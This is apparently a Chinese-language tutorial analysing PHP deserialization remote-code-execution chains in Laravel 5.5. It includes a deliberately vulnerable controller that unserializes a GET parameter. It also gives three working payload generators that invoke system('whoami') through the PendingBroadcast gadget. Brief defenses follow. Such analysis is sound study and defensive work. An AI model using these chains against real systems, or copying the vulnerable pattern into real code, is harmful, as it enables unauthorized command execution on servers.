laravel5.5-序列化导致rce
字数 1594 2025-08-06 08:35:37
Laravel 5.5 反序列化漏洞分析与利用
漏洞概述
Laravel 5.5 中存在多个反序列化漏洞,攻击者可以通过精心构造的序列化数据实现远程代码执行(RCE)。这些漏洞主要源于Laravel框架中某些类的反序列化操作不当,允许攻击者控制关键参数并执行任意PHP函数。
环境搭建
- 下载Laravel 5.5安装包
- 使用PHPStudy等工具快速搭建环境
- 创建测试控制器和路由:
// /routes/web.php
Route::get("/","\App\Http\Controllers\DemoController@demo");
// /app/Http/Controllers/DemoController.php
namespace App\Http\Controllers;
use Illuminate\Http\Request;
class DemoController extends Controller {
public function demo() {
if(isset($_GET['c'])) {
$code = $_GET['c'];
unserialize($code);
} else {
highlight_file(__FILE__);
}
return "Welcome to laravel5.5";
}
}
漏洞利用链分析
利用链1:通过Dispatcher类的dispatch方法
利用原理:
- 入口点为
Illuminate\Broadcasting\PendingBroadcast类 - 通过控制
$events和$event参数调用任意类的dispatch方法 - 利用
Illuminate\Events\Dispatcher类的dispatch方法中的回调执行系统命令
EXP构造:
<?php
namespace Illuminate\Broadcasting {
class PendingBroadcast {
protected $events;
protected $event;
function __construct($events, $parameter) {
$this->events = $events;
$this->event = $parameter;
}
}
}
namespace Illuminate\Events {
class Dispatcher {
protected $listeners;
function __construct($function, $parameter) {
$this->listeners = [$parameter => [$function]];
}
}
}
namespace {
$b = new Illuminate\Events\Dispatcher('system','whoami');
$a = new Illuminate\Broadcasting\PendingBroadcast($b,'whoami');
echo base64_encode(serialize($a));
}
攻击流程:
PendingBroadcast->__destruct()调用$events->dispatch($this->event)Dispatcher->dispatch()遍历$this->getListeners($event)返回的监听器$listener($event, $payload)执行系统命令
利用链2:通过ChannelManager类的__call方法
利用原理:
- 同样以
PendingBroadcast类为入口 - 利用
Illuminate\Notifications\ChannelManager类的__call方法 - 通过
driver()->createDriver()->callCustomCreator()链执行命令
EXP构造:
<?php
namespace Illuminate\Broadcasting {
class PendingBroadcast {
protected $events;
function __construct($events) {
$this->events = $events;
}
}
}
namespace Illuminate\Notifications {
class ChannelManager {
protected $app;
protected $defaultChannel;
protected $customCreators;
function __construct($function, $parameter) {
$this->app = $parameter;
$this->customCreators = ['nice' => $function];
$this->defaultChannel = 'nice';
}
}
}
namespace {
$b = new Illuminate\Notifications\ChannelManager('system','whoami');
$a = new Illuminate\Broadcasting\PendingBroadcast($b);
echo base64_encode(serialize($a));
}
攻击流程:
PendingBroadcast->__destruct()调用$events->dispatch()ChannelManager->__call()调用driver()方法createDriver()检查$this->customCreators[$driver]callCustomCreator()执行$this->customCreators[$driver]($this->app, ...)
利用链3:通过Validator类的__call方法
利用原理:
- 以
PendingBroadcast类为入口 - 利用
Illuminate\Validation\Validator类的__call方法 - 通过
callExtension()中的call_user_func_array()执行命令
EXP构造:
<?php
namespace Illuminate\Broadcasting {
class PendingBroadcast {
protected $events;
protected $event;
function __construct($events, $event) {
$this->events = $events;
$this->event = $event;
}
}
}
namespace Illuminate\Validation {
class Validator {
public $extensions;
function __construct($function) {
$this->extensions = ['' => $function];
}
}
}
namespace {
$b = new Illuminate\Validation\Validator('system');
$a = new Illuminate\Broadcasting\PendingBroadcast($b,'whoami');
echo base64_encode(serialize($a));
}
攻击流程:
PendingBroadcast->__destruct()调用$events->dispatch($this->event)Validator->__call()检查$this->extensions[$rule]callExtension()执行call_user_func_array($this->extensions[$rule], $parameters)
防御措施
- 升级到最新版本的Laravel框架
- 避免反序列化用户可控的数据
- 使用Laravel提供的安全反序列化方法
- 对反序列化操作进行严格的输入验证
总结
Laravel 5.5中存在多个反序列化漏洞利用链,主要利用点是:
PendingBroadcast类的__destruct方法- 通过
__call魔法方法或特定类的dispatch方法实现命令执行 - 精心构造的序列化数据可以控制回调函数和参数
这些漏洞对于理解PHP反序列化漏洞和Laravel框架内部机制有很好的学习价值,但在实际应用中应严格防范此类安全问题。